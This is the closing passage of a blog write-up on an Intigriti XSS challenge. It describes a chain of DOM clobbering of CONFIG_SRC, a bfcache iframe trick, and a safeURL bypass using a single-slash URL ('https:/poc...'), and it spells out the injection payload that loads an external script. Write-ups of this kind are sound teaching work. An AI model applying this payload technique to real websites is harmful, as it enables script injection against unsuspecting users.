vitorfhc/vitorfalcao.com/content/posts/intigriti-0525-writeup.md

 So, there you have it!
 What started as a "quick look" at Johan's latest Intigriti challenge turned into a fascinating deep dive spanning over a day.
 We navigated the intricacies of `DOMPurify` (thankfully, with default settings allowing some HTML), wrestled with the timing of `requestIdleCallback`, and ultimately tamed it using a neat bfcache trick involving `iframe` navigation to ensure our DOM Clobbering payload for `window.CONFIG_SRC` landed before `addDynamicScript` could fetch the default confetti script.

 The final boss was the `safeURL` function, designed to keep loaded scripts within the same origin.
 The key was realizing the subtle but critical difference in how `new URL(src, location)` (in `safeURL`) and `new URL(src)` (in `addDynamicScript`) parse URLs.
 By crafting a payload like `https:/poc.vitorfalcao.com/intigriti.js` (note the single slash!), we made the `safeURL` check see it as a same-origin path relative to `location.origin`, while `addDynamicScript` interpreted it as an absolute URL to an external domain.

-The complete attack chain involved:
-1. Injecting HTML via the `name` parameter: `?name=<span id="CONFIG_SRC" data-url="https:/poc.vitorfalcao.com/intigriti.js">test</span><strong>test` (with a trailing space to satisfy the initial regex, and ensuring the `strong` tag from the server response was properly handled).
-2. Using an `iframe` to load the challenge page with this payload.
-3. After a delay (to allow the fetch and DOM injection), redirecting the `iframe` to a `back.html` page which then uses `history.go(-1)` to navigate back.
-This bfcache-powered return ensured our clobbered `CONFIG_SRC` was active.
-4. The `addDynamicScript` then executed, its `safeURL` check was bypassed by our crafted URL, and `script.src` was set to our external malicious script, leading to glorious XSS.

 This challenge was a brilliant reminder of how seemingly small details in JavaScript execution, DOM manipulation, and URL parsing can combine to create exploitable vulnerabilities.
 Huge props to Johan for another mind-bending puzzle!
 And yes, the confetti finally stopped.